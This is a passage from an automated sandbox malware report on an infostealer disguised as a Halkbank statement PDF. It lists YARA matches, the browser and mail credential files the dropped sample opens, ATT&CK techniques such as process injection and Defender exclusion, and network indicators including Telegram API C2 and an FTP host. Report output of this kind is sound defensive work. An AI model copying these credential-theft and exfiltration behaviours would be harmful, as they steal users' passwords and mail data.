                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    Source: Yara matchFile source: 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2615770776.0000000003478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    Source: Yara matchFile source: 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory13
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job
                    13
                    Obfuscated Files or Information
                    Security Account Manager11
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSHKeylogging3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input Capture24
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1596082 Sample: Halkbank Ekstre.pdf.exe Startdate: 21/01/2025 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 18 other signatures 2->68 8 Halkbank Ekstre.pdf.exe 7 2->8         started        12 uAHDaCgpWpsogA.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...\uAHDaCgpWpsogA.exe, PE32 8->38 dropped 40 C:\...\uAHDaCgpWpsogA.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp9D32.tmp, XML 8->42 dropped 44 C:\Users\user\...\Halkbank Ekstre.pdf.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 14 Halkbank Ekstre.pdf.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 76 Injects a PE file into a foreign processes 12->76 24 uAHDaCgpWpsogA.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 kashmirestore.com 119.18.54.39, 21, 35453, 36695 PUBLIC-DOMAIN-REGISTRYUS India 14->52 54 api.telegram.org 149.154.167.220, 443, 49850, 49915 TELEGRAMRU United Kingdom 14->54 56 2 other IPs or domains 14->56 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 36 conhost.exe 26->36         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.